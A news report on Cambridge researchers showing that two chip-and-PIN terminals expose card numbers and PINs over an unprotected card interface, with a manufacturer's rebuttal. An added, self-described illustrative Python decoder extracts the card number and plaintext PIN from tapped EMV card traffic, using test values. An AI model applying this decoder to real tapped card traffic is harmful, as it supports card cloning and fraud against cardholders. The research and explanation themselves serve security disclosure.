London, February 28 : Cambridge University experts have shown that the chip-and-PIN system used to verify credit and debit card payments in Britain has exploitable weaknesses.
Ross Anderson, a researcher from the university's computer security lab, says that an attacker can insert a simple data-tapping circuit between an inserted card and the reader circuitry of two common PIN Entry Devices (PEDs), made by Ingenico and Dione, and thereby record both the account number and the PIN as they pass over that unprotected interface.
"Armed with this information, fraudsters can create a counterfeit card and withdraw cash from ATMs abroad. We have successfully demonstrated the attack on a real terminal," New Scientist magazine quoted Anderson as saying.
The researchers say that little technical sophistication is required to carry out such an attack.
"These PEDs fail to protect the communication path that carries the card data from the card to the PIN keypad, and that carries the PIN from the PIN keypad back to the card," says Saar Drimer, a member of the research team.
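As an added illustration, not part of the original report or of the Cambridge team's work, the following decoder shows why a passive tap on the card interface is enough. It assumes an EMV card doing offline plaintext PIN verification, so that the PIN travels to the card in the clear in a VERIFY command (CLA 00, INS 20, P2 80, ISO 9564 format 2 PIN block) and the PAN comes back from the card in a READ RECORD response as tag 5A (or tag 57, Track 2 Equivalent Data). The captured exchange is constructed for the example; the PAN and PIN in it are test values, and the page does not say which commands the researchers' circuit recorded.

```python
"""Decode a tapped card-to-PED exchange to recover the PAN and the PIN.

Example code added for illustration; not from the article or the researchers.
Assumptions (not stated on the page): EMV offline plaintext PIN (VERIFY with
P2 = 0x80) and the PAN carried in tag 5A or 57 of a READ RECORD response.
"""

# Constructed capture: (direction, bytes). "C" = terminal -> card command APDU,
# "R" = card -> terminal response data followed by SW1 SW2.  Test PAN/PIN only.
SAMPLE_CAPTURE = [
    ("C", bytes.fromhex("00A4040007A000000003101000")),               # SELECT AID
    ("R", bytes.fromhex("6F0F8407A0000000031010A504500256499000")),   # FCI, SW 9000
    ("C", bytes.fromhex("00B2010C00")),                               # READ RECORD
    ("R", bytes.fromhex("70105A0841111111111111115F24032512319000")), # PAN, expiry
    ("C", bytes.fromhex("002000800824" + "1234" + "FFFFFFFFFF")),     # VERIFY, plaintext PIN
    ("R", bytes.fromhex("9000")),
]


def parse_tlv(data, tags=None):
    """Flatten BER-TLV into {tag_hex: value}, recursing into constructed tags
    (bit 6 of the first tag byte set).  Multi-byte tags such as 5F24 are handled."""
    tags = {} if tags is None else tags
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):          # inter-object padding
            i += 1
            continue
        start = i
        first = data[i]
        i += 1
        if first & 0x1F == 0x1F:             # subsequent tag bytes while bit 8 set
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                    # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:
            parse_tlv(value, tags)
        else:
            tags[tag] = value
    return tags


def decode_pin_block(block):
    """ISO 9564 format 2 block as sent in EMV VERIFY: control nibble 2, PIN
    length nibble, PIN digits, then F padding.  Nothing is encrypted."""
    digits = block.hex().upper()
    if digits[0] != "2":
        raise ValueError("not a format-2 PIN block")
    n = int(digits[1], 16)
    pin = digits[2:2 + n]
    if not pin.isdigit() or digits[2 + n:].strip("F") != "":
        raise ValueError("malformed PIN block")
    return pin


def extract_pan_and_pin(capture):
    """Walk the tapped APDUs; return (pan, pin) found on the wire, None if absent."""
    pan = pin = None
    last_ins = None
    for direction, apdu in capture:
        if direction == "C":
            ins, p2 = apdu[1], apdu[3]
            last_ins = ins
            if ins == 0x20 and p2 == 0x80:   # VERIFY with plaintext PIN block
                lc = apdu[4]
                pin = decode_pin_block(apdu[5:5 + lc])
        else:
            if apdu[-2:] != b"\x90\x00" or last_ins != 0xB2:
                continue                     # only successful READ RECORD responses
            tags = parse_tlv(apdu[:-2])
            if "5A" in tags:                 # Application PAN, compressed numeric, F padded
                pan = tags["5A"].hex().upper().rstrip("F")
            elif "57" in tags:               # Track 2 Equivalent Data: PAN before 'D'
                pan = tags["57"].hex().upper().split("D")[0]
    return pan, pin


if __name__ == "__main__":
    pan, pin = extract_pan_and_pin(SAMPLE_CAPTURE)
    print(f"PAN {pan}  PIN {pin}")
```

The decoder needs no key material and no tamper-proof boundary to be crossed, which is the point of the quoted criticism: whatever the PED's enclosure protects, the card interface itself carries the PAN and, with plaintext offline PIN verification, the PIN in the clear. Had the card and terminal negotiated enciphered offline PIN (P2 = 0x88), the PIN block would be RSA-encrypted to the card and this tap would recover only the PAN.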
PEDs are supposed to be evaluated under a security-checking scheme called the "Common Criteria", an international evaluation standard whose UK certification scheme is overseen by Government Communications Headquarters (GCHQ).
However, the Cambridge researchers say that they do not know how the security checks on the devices were performed.
"GCHQ has not heard of the work and says that the devices were never certified under the Common Criteria," the research group said in a statement.
The researchers even suggest that the vendors concerned withdraw their PED terminals until the flaws are fixed.
PED manufacturers, however, insist that the risk is exaggerated.
"Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47 per cent year-on-year," a statement issued by PED maker Ingenico said.
"The method identified by the Cambridge University paper requires specialist knowledge and has inherent technical difficulties. This method is therefore not reproducible on a large scale, nor does it take into account the fraud monitoring used throughout the industry," the company added.
The Cambridge team will present a paper on the vulnerability at the IEEE Symposium on Security and Privacy conference in Oakland, California, in May.